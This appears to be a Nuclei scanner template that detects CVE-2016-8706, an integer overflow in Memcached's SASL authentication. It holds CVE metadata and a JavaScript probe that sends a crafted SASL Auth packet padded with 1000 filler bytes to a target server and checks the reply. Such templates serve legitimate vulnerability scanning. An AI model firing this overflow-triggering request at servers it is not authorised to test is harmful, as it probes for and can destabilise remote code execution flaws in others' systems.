id: CVE-2016-8706
|
|
|
|
info:
|
|
name: Memcached Server SASL Authentication - Remote Code Execution
|
|
author: pussycat0x
|
|
severity: high
|
|
description: |
|
|
An integer overflow in the process_bin_sasl_auth function of Memcached, which handles authentication commands for the Memcached binary protocol, can be abused to cause a heap overflow and lead to remote code execution.
|
|
reference:
|
|
- https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-8706
|
|
- http://rhn.redhat.com/errata/RHSA-2016-2819.html
|
|
- http://www.debian.org/security/2016/dsa-3704
|
|
- http://www.securitytracker.com/id/1037333
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.1
|
|
cve-id: CVE-2016-8706
|
|
cwe-id: CWE-190
|
|
epss-score: 0.89998
|
|
epss-percentile: 0.98714
|
|
cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: memcached
|
|
product: memcached
|
|
verified: true
|
|
tags: cve,cve2016,rce,js,memcached
|
|
|
|
javascript:
|
|
- pre-condition: |
|
|
isPortOpen(Host,Port);
|
|
code: |
|
|
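// Probe for CVE-2016-8706: send a single SASL Auth request over the memcached
// binary protocol and hand the server's reply to the template's word matchers.
const c = require("nuclei/net");

// Request bytes, in the order they are written to the buffer.
let packet = bytes.NewBuffer();
// 0x80 = binary-protocol request magic, 0x21 = SASL Auth opcode.
packet.Write(new Uint8Array([0x80, 0x21]));
let cmd = 'stats';
packet.WriteString(cmd);
// "!H" / "!I": network-order (big-endian) unsigned 16-bit and 32-bit fields.
packet.Pack("!H", [32]);
packet.Pack("!I", [1]);
// 1000 bytes of filler appended after the packed fields.
let buzz = Array(1000).fill("A").join('');
packet.WriteString(buzz);

let conn = c.Open('tcp', `${Host}:${Port}`);
let reply;
try {
  conn.SendHex(packet.Hex());
  reply = conn.RecvString();
} finally {
  // Release the socket even when the send or the read throws; the original
  // script never closed the connection.
  conn.Close();
}
// Keep the reply as the final expression, as the original did with
// conn.RecvString(), so the matchers ("Invalid arguments" present,
// "Auth failure" absent) still evaluate the server's response.
reply;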
|
|
args:
|
|
Host: "{{Host}}"
|
|
Port: 11211
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "Invalid arguments"
|
|
|
|
- type: word
|
|
words:
|
|
- "Auth failure"
|
|
negative: true
|
|
# digest: 4b0a00483046022100d530ec07154a983e51429b70c966e0479cf23a632a8774c3a3571aaa0d5801b20221009d852686cc74fbc1b375c6492ee8121bf7fb25b9f89848db650b67ed480f225b:922c64590222798bb761d5b6d8e72950 |